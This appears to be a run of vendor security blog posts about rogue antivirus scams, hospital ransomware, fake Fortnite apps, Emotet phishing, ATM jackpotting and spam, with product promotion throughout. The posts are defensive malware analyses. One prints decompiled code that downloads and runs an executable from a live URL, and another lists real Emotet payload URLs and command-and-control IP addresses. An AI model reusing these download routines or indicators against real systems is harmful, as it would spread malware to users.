What is Internet Security?

What Is Internet Security
Reading Time: 5 minutes

Internet security is a branch of computer security which comprises various security measures exercised for ensuring the security of transactions done online. In the process, the internet security prevents attacks targeted at browsers, network, operating systems, and other applications. Today, businesses and governments are more concerned about safeguarding from Cyber attacks and malware programs that originate from the internet. The main aim of Internet security is to set up precise rules and regulations that can deflect attacks that arise from the Internet.

Internet security relies on particular resources and criteria for safeguarding the data that is communicated or transferred online. The safeguarding techniques include different kinds of encryption such as Pretty Good Privacy (PGP). Besides, the other features of a secure Web setup can include firewalls that prevent undesired traffic, and anti-spyware, anti-malware, and anti-virus programs that work from particular networks or devices to watch online traffic for malicious attachments.

What Is Internet Security

An excellent Internet security safeguards financial details and much more of what is controlled by a company or agency’s servers and network hardware. Inadequate Internet security can bring down any business where data (Financial or Sensitive) gets routed over the Web.

Internet Security Essentials – Know About The Internet security Scam

One of the best examples of the internet security scams is the internet security essentials – a rogue security software behaving to protect the Windows computers against malware and viruses installs itself through the use of a trojan horse. The fake antivirus program affected Microsoft operating systems namely the Windows 9x, 2000, XP, Vista, Windows 7 and Windows 8. It relates to the “FakeVimes” family of fake antivirus malware!

Internet Security Essentials Alert is a fake program which is part of a scam chiefly devised to deceive the user into paying money for malware.

Internet Security Essentials works like a rogue antivirus software. It uses the scare tactics and fakes the user into believing that it has an association with Windows in order to make the user pay for the malware/virus removal. The symptoms of Internet Security Essentials infection are pretty standard. When the computer gets the infection, the user will notice a fake home screen, which is made to look as if it is a window within Windows, as a system component. The fake interface will run phony system scans to deceive the user.

 

Need 100% Protection Against Malware Attacks And Threats
Comodo Internet Security Suite For PC
→ Tracks down and destroy any existing malware hiding in a PC.
→ Detects spyware threats and destroys each infection.
→ Scans, detects & removes rootkits on your computer.
→ Prevents malicious software turning your PC into a zombie.
→ Free Trial for 30 days
→ Enroll right away
GET NOW

Types of Internet Security Devices and Software For Business

One of the best examples of the internet security scams is the internet security essentials – a rogue security software behaving to protect the Windows computers against malware and viruses installs itself through the use of a trojan horse. The fake antivirus program affected Microsoft operating systems namely the Windows 9x, 2000, XP, Vista, Windows 7 and Windows 8. It relates to the “FakeVimes” family of fake antivirus malware!

Internet Security Essentials Alert is a fake program which is part of a scam chiefly devised to deceive the user into paying money for malware.

Internet Security Essentials works like a rogue anti-virus software. It uses the scare tactics and fakes the user into believing that it has an association with Windows in order to make the user pay for the malware/virus removal. The symptoms of Internet Security Essentials infection are pretty standard. When the computer gets the infection, the user will notice a fake home screen, which is made to look as if it is a window within Windows, as a system component. The fake interface will run phony system scans to deceive the user.

The scan comes back with details of many threats found on the user computer which aren’t actually present. However, few fake malware/virus files are actually planted by the malicious Internet Security Essentials program. Thereafter, the user is requested to click on a button that says “Remove all,” but when the user tries doing it, the fake Internet Security Essentials comes back with a message asking the user to pay for the full version of its software to complete the malware cleaning process. The user is directed to a false website that alleges to be the company website of Internet Security Essentials, however, that’s just the payment site for the scam.

Types of Internet Security Devices and Software For Business

A variety of Internet security devices and tools that can be used for businesses and government organizations are needed today. One type needs to help detect the intrusion while the other is should help prevent the intrusion. These tools will greatly help the IT staff when it comes to recognizing issues and in keeping the computer networks safe from threats.

The sophisticated programs are meant to be capable of recognizing a range of threats and ward off attacks respectively. The whole process would include the detection of viruses, spyware, malware, worms, etc. The detection tools will closely observe the system and raise the alarm for the system team to look into the issue when there is a malicious activity happening on the network. On the other hand, the prevention systems (anti-malware systems) enable live monitoring and has the potential to prevent attacks.

As a matter of fact, the Comodo Internet Security packs it all and provides complete protection 24/7 even when a user is not monitoring their computer!

Advantages and Features of Comodo Internet Security

The Comodo Internet Security Suite protects from most of the online attacks and malware activities that can steal the sensitive data stored on a computer. The security suite will robustly stop hackers from accessing financial details and personal information.

Malware arising from the internet can hold a system as a hostage and demand money, secretly gather sensitive information about the computing habits of users, internet activity, keystrokes, etc. Stay protected from all of these threats with the latest version of Comodo Internet Security!

The Comodo Internet Security Key Features

  • Antivirus: Tracks down and destroy any existing malware hiding in a PC.
  • Anti-Spyware: Detects spyware threats and destroys each infection.
  • Anti-Rootkit: Scans, detects & removes rootkits on your computer.
  • Bot Protection: Prevents malicious software turning your PC into a zombie.
  • Defense+: Protects critical system files and blocks malware before it installs.
  • Auto Sandbox Technology: Runs unknown files in an isolated environment where they can cause no damage.
  • Memory Firewall: Cutting-edge protection against sophisticated buffer overflow attacks.
  • Anti-Malware Kills malicious processes before they can do harm.

For more insights, take a look at the official page of Comodo Internet Security!

Related Resource:

Indian Hospitals Crippled by Ransomware Attacks

IKARUS Ransomware
Reading Time: 3 minutes

Ransomware is pretty dreadful when it hits consumer PCs and smartphones. But ransomware is also frequently being used to target organizations and institutions around the world. WannaCry’s effect on the UK NHS public healthcare system last year highlighted how harmful ransomware can be when it hits hospital computers.

This past February, I wrote about a ransomware attack on an American hospital where the target actually paid the ransom in order to restore operations:

“On January 11th, Hancock Regional Hospital in Indiana discovered that their computers had been infected with SamSam ransomware, a malware variant which has existed since early 2016. The hospital decided to pay the four Bitcoin ransom in order to get their files decrypted, which was worth around $55,000 USD at the time…

Hancock Regional Hospital is the anchor of the Hancock Health network, with several facilities in the area east of Indianapolis. The Regional Hospital itself is in Greenfield, Indiana.

When hospital workers discovered the SamSam attack on January 11th, they engaged their incident response and crisis management plan and engaged the hospital legal team and an outside cybersecurity firm. They also contacted the FBI cybercrime task force…

‘We were in a very precarious situation at the time of the attack,’ Hancock Health CEO Steve Long said. ‘With the ice and snow storm at hand, coupled with the one of the worst flu seasons in memory, we wanted to recover our systems in the quickest way possible and avoid extending the burden toward other hospitals of diverting patients. Restoring from backup was considered, though we made the deliberate decision to pay the ransom to expedite our return to full operations.’”

In similar fashion, on July 15th, workers at Mahatma Gandhi Mission Hospital in Navi Mumbai, India discovered ransomware on their computers. On that day, hospital administrators found their computer systems locked, and an encrypted message demanded a Bitcoin ransom for decryption. They found that all of their data from the past fifteen days was also encrypted, and computerized billing and prescription systems were inoperable. The amount of the ransom and the strain of ransomware used has not been reported.

The Cyber Cell of Navi Mumbai police are investigating the incident. “We are trying to ascertain the Internet Protocol Address (IP) from where the email (demanding ransom) originated,” said Deputy Commissioner of Police Tushar Doshi.

Meanwhile another Indian hospital was recently hit by ransomware as well. The attack on MGM New Bombay Hospital in Vashi, India was also discovered on July 15th. The affected systems and data and the strain of ransomware haven’t been reported. The ransom demanded Bitcoin but didn’t specify an amount.

Hospital administrator P.K. Shashanker said “Around 9 PM on Sunday, a system message popped up saying that our system had been hacked and we should contact the culprits to retrieve our data. They had provided an email address, but we did not write to them and filed an FIR on Monday. Our technical team is working on retrieving the data. The hospital has not faced any financial loss.” Vashi Police are investigating.

I can’t be certain with limited information, but I suspect that the attacks may be connected and deployed by the same cyber attackers. Both attacks were discovered on July 15th, and both targeted Indian hospitals.

There are reasons why hospitals are often ransomware targets. Stu Sjouwerman of Cybersecurity firm KnowBe4 said “If you have patients, you are going to panic way quicker than if you are selling sheet metal. (Hospitals) have not trained their employees on security awareness … and hospitals don’t focus on cybersecurity in general.”

Sjouwerman also says that American hospitals are often focused on HIPAA compliance for medical data privacy instead. HIPAA compliance and protecting medical data is important. But so is teaching hospital staff not to open email attachments from unfamiliar entities and properly securing Remote Desktop Protocol implementations, two frequent vectors of ransomware attacks. Data privacy, ransomware prevention, why not do both?

Sjouwerman continued, stating that security awareness training for staff is quite feasible and is worth the effort. “You can actually truly get a dramatic decrease in click-happy employees. You send them frequent simulated phishing attacks, and it starts to become a game. You make it part of your culture and if you, once a month, send a simulated attack, that will get people on their toes.”

The Way of Double Deception: Why Unwanted Applications are a Greater Threat than You Realize

malware attack
Reading Time: 4 minutes

Many people don’t take Potentially Unwanted Applications (PUA) as a serious danger. The reason for such a reckless attitude is that PUA are usually installed with the consent of the user. But this opinion is a big mistake. And not only because a PUA can covertly install other programs like adware or spyware on a drive-by download basis. The vivid example below analyzed by Comodo Threat Research Labs experts clearly demonstrates that a PUA can be a much more threatening weapon.

Meet the software named “Instagram Hacker”. It has the official website https://hackinstagram.net/ and promises … to hack any Instagram account. More of that, you can download and install it for free.

Instagram Hacker
After installation, it prompts to enter an Instagram profile URL and hack the password.

Instagram Password Hacker

The result comes in a few seconds:

But after clicking “View Password” button, a new window appears:

Instagram Hacker View Password

Clicking “Get An Activation Code” button redirects to “Buy page”.

Instagram Hacker activation code

It offers to buy “Activation Code” but … can you smell a fraud in the air? It’s obvious, no software able to break an Instagram password for seconds can exist. So is Instagram Hacker just another deceiving tool to dupe simpletons? The best way to check it is to look inside the application code.

The code is protected with Dotnet Reactor but can be decoded with de4dot tool.

de4dot tool

 

de4dot tool - 2

And now we can see for sure the application is a tool of fraud. The first fragment of code just fakes progress demonstration indicator.

But another one is more interesting. As you can see, it contains a URL with an executable to download if activation was successful.

LoadingWindow()
{
Class2.qDiUy7EzyuIMj();
this.filename = “view.exe”;
this.uri = new Uri(“http://software-logistics.net/external/component/download/view.exe”);
this.InitializeComponent();
if (File.Exists(this.filename))
{
File.Delete(this.filename);
}
try
{
WebClient client1 = new WebClient();
client1.DownloadFileAsync(this.uri, this.filename);
client1.DownloadProgressChanged += new DownloadProgressChangedEventHandler(this.method_1);
client1.DownloadFileCompleted += new AsyncCompletedEventHandler(this.method_2);
}
catch
{
this.method_0();
}
}
}
}

If we run the executable, we will find out that it is the WebBrowserPassView application from NirSoft:

WebBrowserPassView
https://www.nirsoft.net/utils/web_browser_password.html

WebBrowserPassView is just a password extraction tool that reveals the passwords stored by the web browsers. So all passwords this software can extract are not Instagram’s but users’ own passwords kept in their browsers!

Let’s resume: all that Instagram Hacker does is the downloading and launching another PUA from NirSoft. So we obviously face with a fraud tool. Notice the manipulative psychological trick here: if a victim discovers she was cheated, she hardly reports the police about the incident. Because in that case, she would have to confess in trying to hack Instagram, that is an act of committing a cybercrime.

But it’s a thin end of the edge.

The most dangerous threat is that the URL in the application can be easily changed on any other with a malicious file that will be executed on a victim’s machine. So this PUA – as well as many other examples of such malware type – can be used for massive proliferation of various “heavy” malware like trojans, backdoors, ransomware etc.

And this is a good reason to take PUA as really dangerous malware. Because it may turn out to be a springboard for a devastating massive cyberattack.

“Today we shouldn’t consider malware as dangerous or not-so-dangerous,” says Fatih Orhan, the Head of the Comodo Threat Research Labs. ”Any malware does not exist in an isolated space. Nowadays cybercriminals build long malware chains to attack users, and, as you can see, PUA can be a link in such a killing chain. So we should call spade a spade. Yes, these applications are downloaded and run with users’ approval but, as in this case, the approval is extorted by fraud. Throughout potentially unwanted applications pretend to be legitimate, everybody needs to understand it’s just a camouflage. That’s why Comodo not only provide high-end technical protection but regularly informs users to prevent them from dangerous traps in the cyberspace”.

Live secure with Comodo!

The explosion of fake Fortnite game Android Trojans

android trojan
Reading Time: 4 minutes

If you’re into gaming, you’ve probably heard of Fortnite: Battle Royale. Epic Games’ popular new online title debuted on consoles and PCs in September 2017, on iOS this April, and finally on Android for a handful of device models (Samsung Galaxy S7 / S7 Edge , S8 / S8+, S9 / S9+, Note 8, Note 9, Tab S3, and Tab S4) on August 9th. Unlike iOS, users can side-step the Android Google Play portal and sideload un-curated apps without needing to jailbreak the device or performing other unsanctioned activities. For Android, sideloading involves installing an from outside of the official Android package repository.. Epic took full advantage of that openness in the Android platform as a way to avoid letting Google take a 30% cut of their sales by distributing the game through their own website instead.

Android Trojans

If you want to install Fortnite: Battle Royale on your Android device, I urge you to go to fortnite.com/android. That URL will redirect you to a different page on https://www.epicgames.com depending on your geography. If you find Fortnite for Android hosted somewhere else, it’s probably trojan malware. At least seven phishing sites have appeared in recent days for the sole purpose of distributing fake Fortnite game Android trojans. By downloading one, you’ll almost certainly end up seriously compromising the security of your Android device and its data, rather than enjoying a fun and legitimate game app. Some of the phishing sites even go to the effort of spoofing the UI of the Google Play Store.

google play store

Some cybersecurity professionals think that Epic’s decision to distribute their Android game themselves rather than through the curated Google Play Store is a terrible idea. Falanx Group’s Rob Shapland said

“Epic Games’ decision to publish the Android version of Fortnite outside of the Play Store is a very poor choice for the security of their players. Android devices are already far more susceptible to malware than Apple devices, with the greatest protection being to always download apps from the Play Store as these apps are screened for malware, which prevents most malicious apps from being installed. By encouraging users to download Fortnite outside of the Play Store, Epic Games leave their players vulnerable to malicious copycat apps being installed accidentally if they go to the wrong site. (Epic Games’s decision) normalises the behavior of downloading apps from outside of Play Store, which can only lead to more malicious apps being installed in the long term.”

Side-loading outside of Google Play isn’t the first major malware problem that’s associated with Fortnite. In June, 2018, Rainway, online gaming platform Rainway noticed a major cyber-attack that targeted the Windows version of Fortnite. Sometimes gamers like to cheat and freeload; YouTube videos have appeared claiming to show people how to acquire free “V-Bucks” (Fortnite’s in-game currency) and an “aimbot” which is supposed to make it easier for players to shoot their enemies. If an offer like this sounds too good to be true, it probably is!

Rainway CEO Andrew Sampson wrote

“On the early morning of June 26th, we began receiving hundreds of thousands of error reports to our tracker. Not feeling very excited to see such an influx of events on a Tuesday the engineering team was a bit flustered, after all, we hadn’t released any updates to that particular piece of our solution.

It became pretty clear soon after that this new flood of errors was not caused by something we did, but by something someone was trying to do.

These are attempts to call various ad platforms; the first thing we should note is Rainway does not have ads on it which was an immediate red flag. The first URL, in particular, is JavaScript which is attempting to act and running into an error, triggering our logging. For security and privacy reasons we’ve always whitelisted URLs and the scope of what they can do from within Rainway — it seems now it has the unintended side effect of shining a light on a much broader issue…”

Rainway’s team eventually traced the odd traffic to Fortnite cheating trojans that facilitated HTTPS man-in-the-middle attacks!

“We then spun up a virtual machine and ran the hack, it immediately installed a root certificate on the device and changed Windows to proxy all web traffic through itself. A successful Man in the Middle Attack.

Now, the adware began altering the pages of all web request to add in tags for Adtelligent and voila, we’ve found the source of the problem — now what?

We began by sending an abuse report to the file host, and the download was removed promptly, this was after accumulating over 78,000 downloads. We also reached out to Adtelligent to report the keys linked to the URLs. We have not received a response at this time. SpringServe quickly worked with us to identify the abusive creatives and remove them from their platform.”

If you ever want to download any video game or DLC from outside the official platform store (for example, for PS4, the Sony PlayStation Store where each application is curated, signed and packaged), make sure you do so from the game developer’s official website. If you’re not confident about the site being the developer’s own, don’t take the risk. Err on the side of caution by not downloading in the first place.

I hope that, as Epic ports Fortnite to more Android devices in the future, they change their mind and switch distribution to the Google Play Store. But with mobile software as with Pandora’s (loot) box, once opened, it’s almost impossible to close..

Fortnite trojans reflect a malware trend that Comodo research has observed lately, specifically pertaining to Android. Read more about the rise of Android trojans of all kinds in the latest Comodo Global Threat Report for Q2 2018

Related Resource:

Here’s What I Learned From the Latest Comodo Cybersecurity Global Threat Report

Reading Time: 3 minutes

The second quarter 2018 Comodo Cybersecurity Global Threat Report has just been released! I couldn’t wait to read it, and I’m glad I did. It’s my job to keep on top of the rapidly evolving cyber threat landscape, but I was still surprised by what I learned. I’ll tell you which findings were the most interesting to me. But if you want to learn more, you may download the free report for yourself. This intelligence comes from the over 400 million unique malware samples worldwide that Comodo has detected during the second quarter of the year.

An International Perspective

Trojan malware infections are on the rise. Comodo has noticed a trend in phishing emails that spread trojans through attachments and hyperlinks. Once the user is fooled to open an attachment or click on a link, the trojan infection becomes a malicious foot-in-the-door for a payload that’s often delivered through command and control servers. Of all of the countries where Comodo monitors malware, Germany topped the list for trojans.

Malware trends often correlate with world events, so your time reading about them is time well spent. The anniversary of China’s Tiananmen Square protests, Donald Trump and Vladimir Putin’s meeting in Helsinki, Finland, Armenia’s political revolution, and the tension between Donald Trump and Kim Jong Un all were reflected in malware infection trends which were unlikely to be coincidences. Often these trends are the result of cyberwarfare, and other times hacktivism is a likely motive.

Cryptominers have become a little less frequent, but often a lot more harmful. Many of the latest cryptomining malware has impressive evasion and persistence techniques. Maybe the only symptom you’ll notice from a cryptominer infection is an unusual demand on your client’s CPU and memory. That really worries me.

Android is now one of the top platforms for malware. The Cyber Security Report from Comodo Threat Research Labs has seen a tremendous increase in both quantity and variety. Be really, really careful about sideloading Android apps. You probably should only download APKs from the Google Play Store in order to decrease your risk. Phishing emails and websites are another common source of Android malware. Spyware is the most common type of Android malware, and Comodo has noticed it becoming better at evading detection.

Ukraine and Russia were the most common countries for viruses, India, Turkey, and Russia (again!) for worms, and the United Kingdom for backdoors.

The Worst Trojan

The single most common trojan found in the second quarter is TrojWare.Win.32.Injector. It has been found to be spread by phishing. More specifically, an email that’s designed to look like it’s from a shipping and trading company. If the user executes the malicious file that it comes with, sensitive data from web browsers, email clients, FTP clients, WebDav, and SCP clients are sent to the cyber attacker.

Sneakier Cryptominers

I mentioned that newer cryptominers are getting better at evading detection. That’s often because fileless cryptominers are becoming more common. Fileless malware runs in a target’s CPU and memory without leaving a trace on a HDD or any other sort of data storage. Instead, fileless malware will inject itself into already running processes. So scanning your hard drive won’t find these rotten, pesky things.

BadShell is a cryptominer which fits the above criteria exactly. It exploits Windows’ PowerShell where commands are executed, puts malicious binaries in the Windows registry, and persists through Task Scheduler.

BadShell and other cryptominers can do serious harm to an organization’s network by delegating computer processing power to generating cryptocurrency rather than the activities your organization needs your clients and servers to be engaged in.

The Android Malware Explosion

People like me use our Android phones to organize our lives. I schedule my weeks for business and leisure, do my online banking, buy stuff, check the weather reports from my nearest weather station, plan my public transit travel, and read my email all with my Android phone. There are millions of users like me, and that’s why Android is a popular platform for spyware. Acquiring my phone’s private data would tell you so much about me and my life! And I’m just an ordinary person, really. If I was a prominent CEO or other sort of public figure, data acquired from me could be sold by cyber attackers for big bucks on the Dark Web.

Some of the most common Android spyware detected by Comodo includes KevDroid, Zoo Park, MikeSpy, and Stalker Spy.

I’m just skimming the surface of the valuable insights you can learn from Comodo Cybersecurity’s Global Threat Report Q2 2018. If I piqued your curiosity, you can download your own copy of the report.

Related Resources:
  1. How To Improve Your Company’s Cyber Security Readiness
  2. Why you’re putting your network at risk with a defensive approach to malware
  3. The Seven Advantages of Hiring a Cyber Security Provider
  4. Online Link Scanner

New Immense Attack of Emotet Trojan Targeted Thousands of Users

Cyber Security 2019
Reading Time: 4 minutes

If you ask a malware analyst to name the most dangerous and nefarious trojans, Emotet will be definitely present in the list. According to the National Cybersecurity and Communications Integration Center, the trojan “continues to be among the most costly and destructive malware affecting state, local, tribal, and territorial governments, and the private and public sectors”. Cunning and sneaky, it is massively spread around the world. New immense 4-day long attack of Emotet was intercepted by the Comodo antimalware facilities.

The attack began with the phishing email sent to 28,294 users.

phishing email

As you can see, the email imitates DHL shipment and delivery message. The famous brand name serves as a tool to inspire trust in users. Curiosity factor also plays its role, so the chances a victim will click on the link in the email without thinking a lot are very high. And the moment a victim clicks the link, the attackers’ black magic comes to play.

Clicking on the link runs downloading a Word file. Of course, the Word file has nothing to do with any delivery — except delivery of malware. It contains a malicious macro code. As nowadays Microsoft turns off running macros by default in its products, the attackers need to trick users into running an older version. That’s why when a victim tries to open the file, the following banner appears.

trojan

If a user obeys the attackers’ request, the macro script comes to its mission — rebuilding an obfuscated shell code for the execution of cmd.exe

After rebuilding the obfuscated code, cmd.exe launches PowerShell, and the PowerShell tries to download and execute a binary from any available URL from the list:

-http://deltaengineering.users31.interdns.co.uk/KepZJXT
http://d-va.cz/ZVjGOE9
http://dveri509.ru/y1
http://www.dupke.at/rFQA
http://clearblueconsultingltd.com/VkIiR

At the time of writing, only the last one contained a binary, 984.exe.

The binary, as you may guess, is a sample of Emotet Banker Trojan.

Once executed, the binary places itself to C:\Windows\SysWOW64\montanapla.exe.

After that, it creates a service named montanapla that ensures the malicious process will launch with every startup.

Further, it tries to connect with Command&Control servers (181.142.74.233, 204.184.25.164, 79.129.120.103, 93.88.93.100) to inform the attackers about the new victim. Then the malware waits for the attackers’ commands.

Now the covert remote connection with Command&Control server is established. Emotet is waiting, ready to execute any command from the attackers. Usually, it ferrets out private data on the infected machine; banking information is a priority. But that’s not all. Emotet also is used as a means to deliver many other types of malware to the infected machines. Thus infecting with Emotet can become just the first link in the chain of the endless compromising the victim’s computer with various malware.

But Emotet is not satisfied with compromising only one PC. It tries to infect other hosts in the network. In addition, Emotet has strong abilities to hide and bypass antimalware tools. Being polymorphic, it avoids signature-based detection by antiviruses. Also, Emotet is able to detect a Virtual Machine environment and disguise itself with generating false indicators. All of this makes it a hard nut for a security software.

“In this case, we faced with a very dangerous attack with far-reaching implications”, says Fatih Orhan, The Head of Comodo Threat Research Labs. ”Obviously, such immense attacks are aimed at infecting as many users as possible but that’s only a tip of the iceberg.

Infecting victims with Emotet just triggers the devastating process. First, it infects other hosts in the network. Second, it downloads other types of malware, so the infection process of the compromised PCs becomes endless and grows exponentially. By stopping this massive attack, Comodo protected tens of thousands of users from this cunning malware and cut the killing chain of the attackers. This case is a one more confirmation that our customers are protected even from the most dangerous and powerful attacks”.

Live secure with Comodo!

The heatmap and IPs used in the attack

The attack was conducted from three Cyprus-based IPs and domain @tekdiyar.com.tr. It started on July 23, 2018 at 14:17:55 UTC and ended on July 27, 2018 at 01:06:00.
The attackers sent 28.294 phishing emails.

IP Attack

Related Resources:

Virus Cleaner

Antivirus Software

Computer Virus

New malware threat means bad news for ATMs

Cyber Security 2019
Reading Time: 3 minutes

The most memorable cyber attack demonstration I’ve ever seen was Barnaby Jack’s ATM jackpotting presentation at Black Hat 2010. (Rest in peace, Barnaby Jack.) He exploited vulnerabilities in two third party ATM models made by Triton and Tranax. He bought the ATM devices himself so he could research them and take them to the event. Both ran a version of Microsoft Windows CE. It’s eight years later and embedded versions of Windows 7 and Windows 10 are two of the most common ATM operating systems.

Barnaby Jack began by remotely connecting to the Tranax ATM from his laptop. From there he executed his Jackpot malware which caused the ATM to play music and spit out its money in a dramatic and messy way. If that happened in the real world, bystanders would probably be running to the ATM to grab as much cash as they possibly could. For his second attack, he put his USB stick into the Triton ATM. His Scrooge rootkit enabled him to rewrite the device’s firmware. Through the malicious firmware, Barnaby Jack was able to withdraw cash from the ATM without needing to use an authenticated bank account. No numbers changed in any bank accounts, the Triton ATM just released its cash as the Tranax ATM did. When a cyber attack causes an ATM to release cash without taking the money from a bank account or credit card, that’s called jackpotting.

The vulnerable ATMs could be found, targeted, and exploited by war driving if the device presented any sort of wireless network connectivity. (War driving is the act of looking for WLANs or WiFi connected devices while walking or driving around an area with a WiFi transceiver.)

Fast forward to November 2017. The FBI caught three men visiting ATMs in Wyoming, Colorado, and Utah together to engage in jackpotting attacks which helped them steal tens of thousands of dollars. Surveillance camera footage from one attack showed the men opening the top of an ATM in order to physically deploy Ploutus.D malware. The FBI said:

“Often the malware requires entering of codes to dispense cash. Codes can be obtained by a third party, not at the location, who then provides the codes to the subjects at the ATM. This allows the third party to know how much cash is dispensed from the ATM, preventing those who are physically at the ATM from keeping cash for themselves instead of providing it to the criminal organization. The use of mobile phones is often used to obtain these dispensing codes.”

On August 10th, the FBI sent an alert to banks around the world. Apparently, Jackpotting attacks are a bigger threat than ever, and banking institutions must be vigilant. All successful jackpotting attacks to date have involved physically deploying malware to targeted ATMs, one at a time.

“The FBI has obtained unspecified reporting indicating cyber criminals are planning to conduct a global Automated Teller Machine (ATM) cash-out scheme in the coming days, likely associated with an unknown card issuer breach. Historic compromises have included small-to-medium size financial institutions, likely due to less robust implementation of cyber security controls, budgets, or third-party vendor vulnerabilities. The FBI expects the ubiquity of this activity to continue or possibly increase in the near future.”

Another jackpotting attack methodology the FBI warns about involves magnetic strip cards.“The cyber criminals typically create fraudulent copies of legitimate cards by sending stolen card data to co-conspirators who imprint the data on reusable magnetic strip cards, such as gift cards purchased at retail stores. At a pre-determined time, the co-conspirators withdraw account funds from ATMs using these cards.”

ATM manufacturers like Diebold, Tranax, and Triton must work with Microsoft to deploy better patches against jackpotting malware. Also, ATM manufacturers and banks should never use operating systems that are no longer supported with security patches. That’s been a common problem all around the world

The FBI has some additional tips.

  • Implement application whitelisting to make it more difficult for malware to be executed on an ATM.
  • Separation of duties or dual authentication procedures should be implemented for withdrawal increases above a certain threshold.
  • Watch for TLS traffic from non-standard ports.
  • Look for network connections made from outside the geographic area that would be atypical of the bank’s outbound connections.
  • Monitor for the presence of remote network protocols and administrative tools.
  • And finally, be very careful to monitor and limit user accounts that have privileges to modify ATMs or bank accounts in any way.

It seems that the FBI has reason to believe that many financial institutions don’t monitor their ATMs as thoroughly as they should. If ATMs aren’t configured to specifically whitelist the applications they were designed to use, that’s a serious security flaw that’s easily avoidable. The successful jackpotting attacks so far usually involve the attacker physically tampering with their targeted ATMs. Is there a way for police or armed security guards to be deployed to ATMs within a few minutes of tampering being caught on camera?

The financial incentive for banks to put serious effort into security hardening against jackpotting attacks couldn’t possibly be more obvious. I’d love to see the Beagle Boys try these sorts of attacks on DuckTales. Disney rebooted that show? Well, thanks for the childhood nostalgia!

Tips to Make Your Web Gateway Secure

Website Security
Reading Time: 2 minutes

With a heavy flow of new security threats targeting the organizations for their data and money, IT security experts at organizations are finding it a daunting task to deny the ever-evolving sophisticated threats. A web security gateway is a product for any organization’s security. Implementing, configuring and maintaining a secure web gateway affects the level of security and how effective it provides.
In this article we will discuss about how web security gateway works to secure the organization from threats. Read on to know more..
Choosing the right strategy to deploy a web security gateway
One main factor that influences in protecting your organization’s network is by choosing the right Secure Web Gateway with the right set of features that includes

• HTTPS scanning
• URL Filtering
• Threat Intelligence feeds
• Mobile Support
• Data Loss Prevention
• Application Control
• Threat and Traffic Visualization

Organization should frame strict security objectives understanding the advantages and disadvantages of the implementation and strategies to be followed. This would entitle the organization to gain more benefits of a web secure gateway. Cloud-based Web Security Gateway is taking its phase of popularity and the growing interest seems to outweigh the on-premise system.. There is also an option to deploy a combination of cloud and on-premise which is becoming common too.

 

Integrating a Web Security Gateway with other Endpoint Security Products

Secondly, before deploying a Web Security Gateway, it is vital to have a check on the security controls. It is also important to understand the purpose of the other security devices on the network and for what they are installed and configured to mitigate. Also understand the rules and filters they implement to ensure security policies. Never fail to educate employees on the recent social media attacks. Above all check if it is easy to integrate web security gateway with the existing endpoint security products to avoid interruption in delivering network protection.

Mapping Acceptable Use and Compliance Policies to Rule Sets

 

Organizations should look into the usage of social website and take control over the same. Web Security Gateway can streamline the security process by enforcing to practice strict rules and security policies to comprehend the flow of traffic. It gives granular level of control on specific applications.

 

Setting up a Standard Procedure for Reviewing and Examining the Alerts and Enhancing Rule Sets

When a specific rule is not followed, there is an alert provided by the web security gateway. It is critical and inevitable to prioritize events, if you have to deal with multiple incidents. Incidents that involve highly valuable business-related data and those that can be easily compromised should be prioritized first and investigated immediately.

Evaluating the effectiveness of Secure Web gateway is done by monitoring the type and the number of incidents and the alerts as well. Visually mapping and regular tracking of the type of traffic would entitle IT admins to mitigate the false alerts. Set procedures and processes to conduct audit so as to verify if the rule sets are serving the intended purpose and are implementing the security policy in the right way.

Related Resource:

5 Easy Ways to Stop Spam Emails

stop spam emails
Reading Time: 2 minutes

Nearly half of all the emails sent in the entire world is spam. That’s a LOT of spam to clear. And spam isn’t new; it’s been around since the time of the invention of the email (in the 1980’s). While spam may seem easily avoidable for some people, it remains the no. 1 cause of viruses and other types of malware to enter into the computers or even entire networks.

This article will explain what to look out for, provide some tips on ways to stop spam emails –even those that look very real -and how you can reduce your exposure to spam.

#1 Train your spam filter

When you get a spam email from an unknown sender, don’t just delete it. Select it, and mark it as a spam message. Sometimes, your email client may mark an important email from a known sender as spam. In such scenarios, you need to mark that email as safe to train the email client about your false positives.

#2 Never respond to spam

In case you received a spam email and recognized it before you open it, don’t open it. If you realize an email as spam only after opening it, mark it as spam and close it. Do not click the links or buttons, or download files from the spam messages.

#3 Use alternative email addresses

A lot of unwanted emails can make their way into your inbox if you order a product or subscribe to a mailing list. By ordering a product or subscribing to a mailing list of a company, you are automatically signed up to receive unwanted marketing updates from that company, or it may share your contact information with a third-party advertiser.

One simple solution to stop such spam emails is to create a secondary email address that you can use for such activities. By doing so, those unwanted marketing emails will not appear in your primary email inbox.

#4 Hide your email address

The more people who expose your email address, the more spam emails you are going to get. So keep your email address hidden from public view. Avoid publishing your primary email address on the web unless it is required. Use alternative email addresses for such scenarios.

#5 Use a third-party Anti-spam filter

Most of the Anti-spam solutions that are available today can be customized as per your needs, allowing only the approved emails into your inbox. There are free anti-spam software as well as paid anti-spam software.

Comodo Dome Antispam is one such solution which can quickly identify and filter spam emails from your inbox. It uses advanced spam filters, and content analysis engines to detect and prevent unsolicited emails from entering your network.

If you are in search of a good anti-spam solution that stops spam emails, look no further get Comodo Dome Anti-spam today!

Dome Antispam